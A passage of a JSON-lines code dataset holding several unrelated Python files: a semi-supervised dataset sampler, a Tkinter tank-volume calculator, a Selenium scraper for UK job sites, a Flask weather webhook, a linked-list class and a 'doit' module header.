len(aux_targets)\n num_to_noise = int(num_aux * aux_label_noise)\n logging.info('Making %d/%d aux labels noisy, '\n 'numpy rng state MD5=%s' %\n (num_to_noise, num_aux,\n md5(np.random.get_state()[1]).hexdigest()\n ))\n inds_to_noise = np.random.choice(\n num_aux, num_to_noise, replace=False)\n permutated_labels = np.random.permutation(\n aux_targets[inds_to_noise])\n aux_targets[inds_to_noise] = permutated_labels\n\n self.targets.extend(aux_targets)\n self.data = np.concatenate((self.data, aux_data), axis=0)\n # note that we use unsup indices to track the labeled datapoints\n # whose labels are \"fake\"\n self.unsup_indices.extend(\n range(orig_len, orig_len+len(aux_data)))\n\n self.orig_len = orig_len\n logger = logging.getLogger()\n logger.info(\"Training set\")\n logger.info(\"Number of training samples: %d\", len(self.targets))\n logger.info(\"Number of supervised samples: %d\",\n len(self.sup_indices))\n logger.info(\"Number of unsup samples: %d\", len(self.unsup_indices))\n logger.info(\"Label histogram: %s\",\n tuple(\n zip(*np.unique(self.targets, return_counts=True))))\n logger.info(\"Shape of training data: %s\", np.shape(self.data))\n\n # Test set\n else:\n self.orig_len = len(self.data)\n if test_labels is not None:\n self.test_indices = [i for (i, label) in enumerate(self.targets)\n if label in test_labels]\n self.targets = [self.targets[i] for i in self.test_indices]\n self.targets = [test_labels.index(i) for i in self.targets]\n self.data = self.data[self.test_indices, ...]\n self.orig_len = len(self.data)\n logger = logging.getLogger()\n logger.info(\"Test set\")\n logger.info(\"Number of samples: %d\", len(self.targets))\n logger.info(\"Label histogram: %s\",\n tuple(\n zip(*np.unique(self.targets, return_counts=True))))\n logger.info(\"Shape of data: %s\", np.shape(self.data))\n\n @property\n def data(self):\n return self.dataset.data\n\n @data.setter\n def data(self, value):\n self.dataset.data = value\n\n @property\n def targets(self):\n return self.dataset.targets\n\n @targets.setter\n def targets(self, value):\n self.dataset.targets = value\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n self.dataset.labels = self.targets # because torchvision is annoying\n d = self.dataset[item]\n d = list(d)\n d.append(item >= self.orig_len)\n d = tuple(d)\n return d\n # return self.dataset[item]\n\n\n def __repr__(self):\n fmt_str = 'Semisupervised Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Training: {}\\n'.format(self.train)\n fmt_str += ' Root Location: {}\\n'.format(self.dataset.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.dataset.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.dataset.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\nclass SemiSupervisedSampler(Sampler):\n def __init__(self, sup_inds, unsup_inds, batch_size, unsup_fraction=0.5,\n num_batches=None):\n if unsup_fraction is None or unsup_fraction < 0:\n self.sup_inds = sup_inds + unsup_inds\n unsup_fraction = 0.0\n else:\n self.sup_inds = sup_inds\n self.unsup_inds = unsup_inds\n\n self.batch_size = batch_size\n unsup_batch_size = int(batch_size * unsup_fraction)\n self.sup_batch_size = batch_size - unsup_batch_size\n\n if num_batches is not None:\n self.num_batches = num_batches\n else:\n self.num_batches = int(\n np.ceil(len(self.sup_inds) / self.sup_batch_size))\n\n\n super().__init__(None)\n\n def __iter__(self):\n batch_counter = 0\n while batch_counter < self.num_batches:\n sup_inds_shuffled = [self.sup_inds[i]\n for i in torch.randperm(len(self.sup_inds))]\n for sup_k in range(0, len(self.sup_inds), self.sup_batch_size):\n if batch_counter == self.num_batches:\n break\n batch = sup_inds_shuffled[sup_k:(sup_k + self.sup_batch_size)]\n # extending with unlabeled data\n if self.sup_batch_size < self.batch_size:\n batch.extend([self.unsup_inds[i] for i in\n torch.randint(high=len(self.unsup_inds),\n size=(\n self.batch_size - len(\n batch),),\n dtype=torch.int64)])\n\n np.random.shuffle(batch)\n yield batch\n batch_counter += 1\n\n def __len__(self):\n return self.num_batches\n","repo_name":"p-lambda/robust_tradeoff","sub_path":"cifar/code/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"34422995266","text":"# Gerar executável para windows\n\n# pip install pyinstaller\n\n# pyinstaller --onefile tela.py --noconsole\n\nimport tela_support\nimport sys\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter.constants import *\nimport os.path\n\n_script = sys.argv[0]\n_location = os.path.dirname(_script)\n\n\n_bgcolor = '#d9d9d9' # X11 color: 'gray85'\n_fgcolor = '#000000' # X11 color: 'black'\n_compcolor = 'gray40' # X11 color: #666666\n_ana1color = '#c3c3c3' # Closest X11 color: 'gray76'\n_ana2color = 'beige' # X11 color: #f5f5dc\n_tabfg1 = 'black'\n_tabfg2 = 'black'\n_tabbg1 = 'grey75'\n_tabbg2 = 'grey89'\n_bgmode = 'light'\n\n\nclass Toplevel1:\n\n def calcular(self):\n altura = float(self.altura.get())\n raio = float(self.diametro.get())/2\n area = round(3.14*raio**2*altura)\n self.Label3_3.configure(text='Volume: '+str(area)+\" m²\")\n\n def __init__(self, top=None):\n '''This class configures and populates the toplevel window.\n top is the toplevel containing window.'''\n\n top.geometry(\"1327x711+114+137\")\n top.minsize(120, 1)\n top.maxsize(1924, 1061)\n top.resizable(1, 1)\n top.title(\"Toplevel 0\")\n top.configure(background=\"#2e3349\")\n top.configure(highlightbackground=\"#d9d9d9\")\n top.configure(highlightcolor=\"black\")\n\n self.top = top\n self.altura = tk.StringVar()\n self.diametro = tk.StringVar()\n\n self.menubar = tk.Menu(top, font=\"TkMenuFont\",\n bg=_bgcolor, fg=_fgcolor)\n top.configure(menu=self.menubar)\n\n self.Label1 = tk.Label(self.top)\n self.Label1.place(relx=0.588, rely=-0.042, height=886, width=1167)\n self.Label1.configure(activebackground=\"#f9f9f9\")\n self.Label1.configure(anchor='w')\n self.Label1.configure(background=\"#2e3349\")\n self.Label1.configure(compound='left')\n self.Label1.configure(disabledforeground=\"#a3a3a3\")\n self.Label1.configure(foreground=\"#000000\")\n self.Label1.configure(highlightbackground=\"#d9d9d9\")\n self.Label1.configure(highlightcolor=\"black\")\n photo_location = os.path.join(\n _location, \"D:/GitHub/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot/aula3/imagens/tanque.png\")\n global _img0\n _img0 = tk.PhotoImage(file=photo_location)\n self.Label1.configure(image=_img0)\n\n self.Frame1 = tk.Frame(self.top)\n self.Frame1.place(relx=0.039, rely=0.239,\n relheight=0.726, relwidth=0.529)\n self.Frame1.configure(relief='groove')\n self.Frame1.configure(borderwidth=\"2\")\n self.Frame1.configure(relief=\"groove\")\n self.Frame1.configure(background=\"#252a40\")\n self.Frame1.configure(highlightbackground=\"#d9d9d9\")\n self.Frame1.configure(highlightcolor=\"black\")\n\n self.Label3 = tk.Label(self.Frame1)\n self.Label3.place(relx=0.148, rely=0.128, height=79, width=166)\n self.Label3.configure(activebackground=\"#f9f9f9\")\n self.Label3.configure(anchor='w')\n self.Label3.configure(background=\"#252a40\")\n self.Label3.configure(compound='left')\n self.Label3.configure(disabledforeground=\"#a3a3a3\")\n self.Label3.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3.configure(foreground=\"#f2f2f2\")\n self.Label3.configure(highlightbackground=\"#d9d9d9\")\n self.Label3.configure(highlightcolor=\"black\")\n self.Label3.configure(text='''Altura [m]:''')\n\n self.Button1 = tk.Button(self.Frame1)\n self.Button1.place(relx=0.252, rely=0.734, height=74, width=307)\n self.Button1.configure(activebackground=\"beige\")\n self.Button1.configure(activeforeground=\"black\")\n self.Button1.configure(background=\"#007ef9\")\n self.Button1.configure(compound='left')\n self.Button1.configure(disabledforeground=\"#a3a3a3\")\n self.Button1.configure(font=\"-family {Segoe UI} -size 28 -weight bold\")\n self.Button1.configure(foreground=\"#f2f2f2\")\n self.Button1.configure(highlightbackground=\"#d9d9d9\")\n self.Button1.configure(highlightcolor=\"black\")\n self.Button1.configure(pady=\"0\")\n self.Button1.configure(text='''Alterar''')\n\n self.Entry1 = tk.Entry(self.Frame1)\n self.Entry1.place(relx=0.415, rely=0.128, height=60, relwidth=0.348)\n self.Entry1.configure(background=\"white\")\n self.Entry1.configure(disabledforeground=\"#a3a3a3\")\n self.Entry1.configure(font=\"-family {Courier New} -size 20\")\n self.Entry1.configure(foreground=\"#000000\")\n self.Entry1.configure(highlightbackground=\"#d9d9d9\")\n self.Entry1.configure(highlightcolor=\"black\")\n self.Entry1.configure(insertbackground=\"black\")\n self.Entry1.configure(selectbackground=\"#c4c4c4\")\n self.Entry1.configure(selectforeground=\"black\")\n self.Entry1.configure(textvariable=self.altura)\n\n self.Entry2 = tk.Entry(self.Frame1)\n self.Entry2.place(relx=0.415, rely=0.388, height=60, relwidth=0.348)\n self.Entry2.configure(background=\"white\")\n self.Entry2.configure(disabledforeground=\"#a3a3a3\")\n self.Entry2.configure(font=\"-family {Courier New} -size 20\")\n self.Entry2.configure(foreground=\"#000000\")\n self.Entry2.configure(highlightbackground=\"#d9d9d9\")\n self.Entry2.configure(highlightcolor=\"black\")\n self.Entry2.configure(insertbackground=\"black\")\n self.Entry2.configure(selectbackground=\"#c4c4c4\")\n self.Entry2.configure(selectforeground=\"black\")\n self.Entry2.configure(textvariable=self.diametro)\n\n self.Label3_1 = tk.Label(self.Frame1)\n self.Label3_1.place(relx=0.452, rely=-0.252, height=78, width=165)\n self.Label3_1.configure(activebackground=\"#f9f9f9\")\n self.Label3_1.configure(anchor='w')\n self.Label3_1.configure(background=\"#252a40\")\n self.Label3_1.configure(compound='left')\n self.Label3_1.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_1.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_1.configure(foreground=\"#f2f2f2\")\n self.Label3_1.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_1.configure(highlightcolor=\"black\")\n self.Label3_1.configure(text='''Diâmetro [m]:''')\n\n self.Label3_2 = tk.Label(self.Frame1)\n self.Label3_2.place(relx=0.145, rely=0.368, height=79, width=167)\n self.Label3_2.configure(activebackground=\"#f9f9f9\")\n self.Label3_2.configure(anchor='w')\n self.Label3_2.configure(background=\"#252a40\")\n self.Label3_2.configure(compound='left')\n self.Label3_2.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_2.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_2.configure(foreground=\"#f2f2f2\")\n self.Label3_2.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_2.configure(highlightcolor=\"black\")\n self.Label3_2.configure(text='''Diâmetro [m]:''')\n\n self.Label2 = tk.Label(self.top)\n self.Label2.place(relx=0.039, rely=0.068, height=74, width=702)\n self.Label2.configure(activebackground=\"#f9f9f9\")\n self.Label2.configure(anchor='w')\n self.Label2.configure(background=\"#f2f2f2\")\n self.Label2.configure(compound='center')\n self.Label2.configure(disabledforeground=\"#a3a3a3\")\n self.Label2.configure(font=\"-family {Segoe UI} -size 36 -weight bold\")\n self.Label2.configure(foreground=\"#007ef9\")\n self.Label2.configure(highlightbackground=\"#d9d9d9\")\n self.Label2.configure(highlightcolor=\"black\")\n self.Label2.configure(text='''Cálculo do volume''')\n\n self.Label3_3 = tk.Label(self.top)\n self.Label3_3.place(relx=0.716, rely=0.07, height=79, width=307)\n self.Label3_3.configure(activebackground=\"#f9f9f9\")\n self.Label3_3.configure(anchor='w')\n self.Label3_3.configure(background=\"#2e3349\")\n self.Label3_3.configure(compound='left')\n self.Label3_3.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_3.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_3.configure(foreground=\"#ffffff\")\n self.Label3_3.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_3.configure(highlightcolor=\"black\")\n self.Label3_3.configure(text='''Volume:''')\n\n self.Button1.configure(command=self.calcular)\n\n\ndef start_up():\n tela_support.main()\n\n\nif __name__ == '__main__':\n tela_support.main()\n","repo_name":"ubiratantavares/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot","sub_path":"aula4/tela.py","file_name":"tela.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9579051034","text":"# from os import system\n\n# system('pip install -r requirements.txt')\n\nimport datetime\nimport requests\nimport openpyxl\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nfrom threading import Thread\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\ndef prepare_soup(link:str) -> BeautifulSoup:\n '''\n argument -- link:str\n return -- parsed HTML:BeautifulSoup if successful\n False:bool if failed\n '''\n html = requests.get(link)\n if html.status_code == 200:\n # open('a.txt','w',encoding='utf-8').write(html.text)\n return BeautifulSoup(html.text, \"html.parser\")\n else:\n return False\n\ndef filters():\n title = input(\"Enter job title to search for: \")\n location = input('Enter job location: ')\n postage = int(input(\"\"\"Posted withtin:\n 1. Last 24 hours\n 2. Last 3 days\n 3. Last 7 days\n 4. Last 14 days\n 0. All\n \"\"\"))\n job_type = int(input(\"\"\"Job Type:\n 1. Permanent\n 2. Contract\n 3. Temporary\n 4. Part Time\n 0. All\n\"\"\"))\n salary = int(input(\"\"\" Salary:\n 1. at least £10,000 \n 2. at least £20,000 \n 3. at least £30,000 \n 4. at least £40,000 \n 5. at least £50,000 \n 6. at least £60,000 \n 7. at least £70,000 \n 8. at least £80,000 \n 9. at least £90,000 \n 10. at least £100,000\n 0. All\n \"\"\"))\n N = int(input('Enter number of jobs to be scraped from each site:'))\n return title, location, postage, job_type, salary, N\n\n\n\n\n\ndef open_browser(driver, url):\n driver.get(url) \n return driver\n\n\n\n\ndef click_on_filter(driver, element):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, element))\n )\n element.click()\n\n\n\n\ndef write_xl(df,filename, sheet):\n with pd.ExcelWriter(filename, engine=\"openpyxl\", mode=\"a\") as writer:\n df.to_excel(writer, sheet_name=sheet, index=False, encoding='utf-8')\n\n\n\n\n# soup = None\n\ndef efc(driver, JOBTITLE, LOCATION): \n\n def get_efc_descr(link):\n soup = prepare_soup(link)\n if not soup:\n return ''\n desc = soup.find_all('div',{'class':'jobContentFrame'})[0]\n summary = desc.text.strip()\n return summary\n\n\n age_dict = {0:'', 1 : \"ONE\", 2 : \"THREE\", 3 : \"SEVEN\", 4 : \"SEVEN\"}\n type_dict = [\"CONTRACT\", \"PERMANENT\",\"TEMPORARY\", \"INTERNSHIPS_AND_GRADUATE_TRAINEE\"]\n type_dict.insert(0, '%7C'.join(type_dict))\n if sal_fltr < 4: sal = 'FIRST'\n elif sal_fltr < 8: sal = 'SECOND'\n else: sal = \"THIRD_TIER|FOURTH_TIER|FIFTH_TIER|SIXTH\"\n url = f'https://www.efinancialcareers.com/search/?q={JOBTITLE}&location={LOCATION}&page=1&pageSize=100&filters.postedDate={age_dict[age_fltr]}&filters.positionType={type_dict[jt_fltr]}&filters.salaryBand={sal}_TIER'\n print('fetching from site:', url)\n if age_fltr == 0: \n url = url.replace('&filters.postedDate=','')\n driver = open_browser(driver, url)\n try:\n\n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"/html/body/dhi-job-search/dhi-search-page-container/dhi-search-page/div/dhi-search-page-results/div/div[3]/js-search-display/div/div[2]/dhi-search-cards-widget/div/dhi-new-search-card[1]/div\")))\n html = driver.page_source\n # global soup\n soup = BeautifulSoup(html, \"html.parser\")\n for job in soup.findAll('div', 'search-card'):\n if count >= N: \n break\n count += 1\n\n new_link = 'https://www.efinancialcareers.com/' + job.find_all('a',{'class':'card-title-link bold'})[0].attrs['href']\n summary = get_efc_descr(new_link)\n # summary = 'test'\n\n data.append([job.a.text.strip(),\n job.find('div', 'card-salary ng-star-inserted').text.strip(),\n job.find(id = 'searchResultLocation').text.strip(),\n job.find('span', {'data-cy' : 'card-posted-date'}).text.strip(),\n job.find('span', {'data-cy' : 'search-result-employment-type'}).text.strip(),\n summary\n # job.find('div', {'data-cy' : 'card-summary'}).text.strip() + '...'\n ])\n try:\n next_btn = None\n # next_btn = driver.find_element(By.XPATH, \"/html/body/dhi-job-search/dhi-search-page-container/dhi-search-page/div/dhi-search-page-results/div/div[3]/js-search-display/div/div[3]/div[1]/js-search-pagination-container/pagination/ul/li[5]/a\")\n next_btn = driver.find_elements_by_class_name('page-link')\n next_btn[-1].click()\n except NoSuchElementException:\n pass\n except Exception as e:\n # print(e)\n break\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print('An error occured:', e)\n finally:\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, 'efinancialcareers')\n # driver.close()\n print('done')\n\ndef multi_site(driver, JOBTITLE, LOCATION, site = 'cw'):\n url_dict = {\"cw\":'https://www.cwjobs.co.uk',\n \"total\":\"https://www.totaljobs.com\",\n \"jobsite\": \"https://www.jobsite.co.uk/\",\n \"city\": \"https://www.cityjobs.com/\"\n }\n sal_element = f'//*[@id=\"facetListAnnualPayRate\"]/ul/li[{sal_fltr}]/a'\n age_element = f'//*[@id=\"facetListDatePosted\"]/div[2]/ul/li[{age_fltr}]/a'\n jt_element = f'//*[@id=\"facetListJobType\"]/div[2]/ul/li[{jt_fltr}]/a'\n url = url_dict[site]\n print('fetching from site:', url)\n open_browser(driver, url)\n try:\n cookie = driver.find_element_by_class_name(\"privacy-prompt-button.primary-button.accept-button-new\")\n cookie.click()\n except:\n pass\n title_field = driver.find_element_by_id(\"keywords\")\n title_field.send_keys(JOBTITLE)\n loc_field = driver.find_element_by_id(\"location\")\n loc_field.send_keys(LOCATION)\n search_btn = driver.find_element_by_id(\"search-button\")\n search_btn.click()\n try: \n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"col-sm-9.job-results\"))\n )\n if sal_fltr != 0:\n click_on_filter(driver, sal_element)\n if age_fltr != 0:\n click_on_filter(driver, age_element)\n if jt_fltr != 0:\n click_on_filter(driver, jt_element)\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n link_ct = 0\n for job in soup.find_all('div', 'job'):\n link_ct += 1\n if not \"ci-advert-job\" in job['class']:\n if count >= N: \n break\n count += 1\n try:\n links = driver.find_elements_by_class_name('job-title')\n data.append([job.find('h2').text,\n job.find('li', 'salary').text,\n job.find('li', 'location').span.text.replace('\\n', ''),\n job.find('li', 'date-posted').span.text.strip(),\n job.find('li', 'job-type').span.text])\n except:\n print('Some jobs in this site have incomplete information to scrape. Skipping those...')\n # job.find('p', 'job-intro').text])\n try:\n link = links[count].find_element_by_tag_name('a')\n main_window = driver.current_window_handle\n action = ActionChains(driver)\n \n action.key_down(Keys.CONTROL).key_down(Keys.SHIFT).click(link).key_up(Keys.CONTROL).key_up(Keys.SHIFT).perform()\n\n driver.switch_to.window(driver.window_handles[-1])\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"job-description\")))\n desc = driver.page_source\n desc = BeautifulSoup(desc, \"html.parser\")\n p = desc.find('div', \"job-description\").text.strip()\n\n data[-1].append(p)\n # driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 'w')\n driver.close()\n driver.switch_to.window(main_window)\n except Exception as e:\n pass\n # print(e)\n try:\n link_ct = 0\n next_btn = None\n next_btn = driver.find_element_by_class_name('btn.btn-default.next')\n next_btn.click()\n except NoSuchElementException:\n pass\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print(\"An error occured: \",e)\n\n finally:\n print('done')\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, site)\n # driver.close()\n\n\ndef indeed(driver, JOBTITLE, LOCATION):\n\n def indeed_job_description(link):\n soup = prepare_soup(link)\n if not soup:\n return ''\n summary = soup.find(id='jobDescriptionText').text.strip()\n return summary\n \n base_url = 'https://uk.indeed.com'\n\n type_list = ['','permanent','contract','temporary', 'parttime']\n age = {1:1,2:3,3:7,4:14,0:''}\n sal = sal_fltr*10000 if sal_fltr > 0 else ''\n url = f'https://uk.indeed.com/jobs?q={JOBTITLE}+£{sal}&l={LOCATION}&jt={type_list[jt_fltr]}&fromage={age[age_fltr]}'\n if jt_fltr == 0: \n url = url.replace('&jt=', '')\n if age_fltr == 0: \n url = url.replace('&fromage=', '')\n if sal_fltr == 0: \n url = url.replace('+£','')\n print('fetching from site:', url)\n try:\n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n open_browser(driver, url)\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID, \"resultsCol\"))\n )\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n links = driver.find_elements_by_class_name('title')\n link_ct = 0\n for job in soup.findAll('div', 'jobsearch-SerpJobCard'):\n link_ct += 1\n if count >= N: \n break\n count += 1\n\n try:\n salary = job.find_all('span',{'class':'salaryText'})[0].text.strip()\n except:\n salary = '-NA-'\n # try:\n # driver.find_element_by\n # except:\n # intro = '-NA-'\n job_title = job.h2.a.text.strip()\n _location = job.find('span', 'location').text.strip()\n _date = job.find('span', 'date').text.strip()\n _type = type_list[jt_fltr]\n\n # click to new tab\n new_link = base_url + job.h2.a.attrs['href']\n _intro = indeed_job_description(new_link)\n\n data.append([job_title,\n salary,\n _location,\n _date,\n _type,\n _intro\n ])\n #click on job card\n # links[count].find_element_by_tag_name('a').click()\n driver.back()\n try:\n link_ct = 0\n next_btn = None\n next_btn = driver.find_element(By.XPATH, '//*[@id=\"resultsCol\"]/nav/div/ul')\n pos = url.find('&start=')\n if pos != -1:\n url = url[:pos]\n url = url + '&start='+str((count // 10) * 10)\n except NoSuchElementException:\n pass\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print('An error occured:', e)\n finally:\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, 'indeed')\n # driver.close()\n print('done')\n\ndef format_filename(name):\n for i in set(name):\n if not i.isalnum():\n name = name.replace(i, '_')\n return name\n\n\nif __name__ == '__main__':\n timestamp = str(datetime.datetime.now())\n filename = format_filename(timestamp) + '.xlsx'\n writer = openpyxl.Workbook()\n writer.save(filename)\n title, location, age_fltr, jt_fltr, sal_fltr, N = filters()\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument(\"--disable-notifications\")\n chrome_options.add_argument(\"--disable-popup-blocking\")\n driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)\n # driver = webdriver.Chrome(ChromeDriverManager().install())\n multi_site(driver, title, location, site=\"cw\")\n multi_site(driver, title, location, site=\"total\")\n multi_site(driver, title, location, site=\"jobsite\")\n multi_site(driver, title, location, site=\"city\")\n efc(driver, title, location)\n indeed(driver, title, location)\n # Thread(target = efc(\"web-dev\", \"london\")).start()\n # Thread(target = multi_site(\"web-dev\", \"london\")).start()\n driver.quit()\n","repo_name":"VishnuNarayananSR/Freelancing","sub_path":"7-Jobsite-scraping/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":14244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31377662408","text":"from flask import Flask, request, make_response\nimport json\nfrom flask_cors import CORS, cross_origin\nfrom weather import city_weather\n\napp = Flask(__name__)\n\n@app.route('/webhook', methods=['POST'])\n@cross_origin()\ndef weather():\n res = request.json\n result = res.get('queryResult')\n param = result.get('parameters')\n city = param.get('geo-city')\n w = city_weather()\n\n resp = w.weather_in(city)\n resp = json.dumps(resp)\n r = make_response(resp)\n r.headers['content-type'] = 'application/json'\n return r\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"biswajitburagohain/dialogflow_weather_chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74453223529","text":"class Node:\r\n def __init__(self, data): # Instance attributes\r\n self.data = data # attribute called data\r\n self.next = None \r\n \r\n # Instance method ~ dunder method\r\n def __repr__(self):\r\n return self.data\r\n \r\nclass LinkedList:\r\n def __init__(self, nodes=None):\r\n self.head = None \r\n if nodes is not None:\r\n node = Node(data=nodes.pop(0))\r\n self.head = node\r\n for elem in nodes:\r\n node.next = Node(data=elem)\r\n node = node.next\r\n \r\n # Instance method ~ dunder method \r\n def __repr__(self): \r\n node = self.head\r\n nodes = []\r\n while node is not None:\r\n nodes.append(node.data)\r\n node = node.next\r\n nodes.append(\"None\")\r\n return \" -> \".join(nodes)\r\n\r\n \r\n\r\n ","repo_name":"davestroud/Algorithm_Fundamentals","sub_path":"Facebook/Linked_Lists/Linked_List.py","file_name":"Linked_List.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"9987075613","text":"# -*- coding: utf-8 -*-\n#! \\file ./doit/text/pgen/readers/glap/bootstrap/__init__.py\n#! \\author Jiří Kučera, \n#! \\stamp 2016-12-19 02:04:45 (UTC+01:00, DST+00:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nGLAP bootstrap.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nfrom doit.support.utils import \\\n Functor\n\nfrom doit.support.cmd.runtime import \\\n Location\n\nfrom doit.support.cmd.commands import \\\n Const, \\\n MacroNode, MacroNodeSequence, MacroNodeAtom, MacroNodeParam, \\\n Expand, \\\n SetLocal, GetLocal, \\\n DefMacro, Define, DefModule, \\\n Add, Sub, Mul, Div, Mod, Neg, \\\n BitAnd, BitOr, BitXor, ShiftL, ShiftR, Inv, \\\n Lt, Gt, Le, Ge, Eq, Ne, Is, \\\n And, Or, Not, \\\n NewPair, NewList, NewHashMap, \\\n Concat, Join, Merge, \\\n Contains, \\\n GetItem, \\\n Lambda, \\\n Block, If, Foreach, While, DoWhile, Break, Continue, \\\n Call, Return, \\\n TryCatchFinally, Throw, Rethrow, \\\n SetItem, \\\n SetMember, GetMember\n\nfrom doit.text.pgen.errors import \\\n ParsingError\n\nfrom doit.text.pgen.readers.reader import \\\n Reader\n\nfrom doit.text.pgen.models.action import \\\n AddExpr as AAddExpr, SubExpr as ASubExpr, MulExpr as AMulExpr, \\\n DivExpr as ADivExpr, ModExpr as AModExpr, \\\n BitAndExpr as ABitAndExpr, BitOrExpr as ABitOrExpr, \\\n BitXorExpr as ABitXorExpr, \\\n ShiftLeftExpr as AShiftLeftExpr, ShiftRightExpr as AShiftRightExpr, \\\n NegExpr as ANegExpr, InvExpr as AInvExpr, \\\n EqExpr as AEqExpr, NotEqExpr as ANotEqExpr, LtExpr as ALtExpr, \\\n GtExpr as AGtExpr, LeExpr as ALeExpr, GeExpr as AGeExpr, \\\n LogAndExpr as ALogAndExpr, LogOrExpr as ALogOrExpr, NotExpr as ANotExpr, \\\n CallExpr as ACallExpr, \\\n IndexExpr as AIndexExpr, AccessExpr as AAccessExpr, \\\n Id as AId, IntLiteral as AIntLiteral, FloatLiteral as AFloatLiteral, \\\n StringLiteral as AStringLiteral, \\\n Block as ABlock, \\\n Assign as AAssign, InplaceAdd as AInplaceAdd, InplaceSub as AInplaceSub, \\\n InplaceMul as AInplaceMul, InplaceDiv as AInplaceDiv, \\\n InplaceMod as AInplaceMod, InplaceBitAnd as AInplaceBitAnd, \\\n InplaceBitOr as AInplaceBitOr, InplaceBitXor as AInplaceBitXor, \\\n InplaceShiftLeft as AInplaceShiftLeft, \\\n InplaceShiftRight as AInplaceShiftRight, \\\n If as AIf, Case as ACase, For as AFor, While as AWhile, \\\n DoWhile as ADoWhile, Continue as AContinue, Break as ABreak, \\\n Return as AReturn, ReturnWithValue as AReturnWithValue\n\nfrom doit.text.pgen.models.cfgram import \\\n Epsilon, Sym, Literal, Var, Range, Action, \\\n 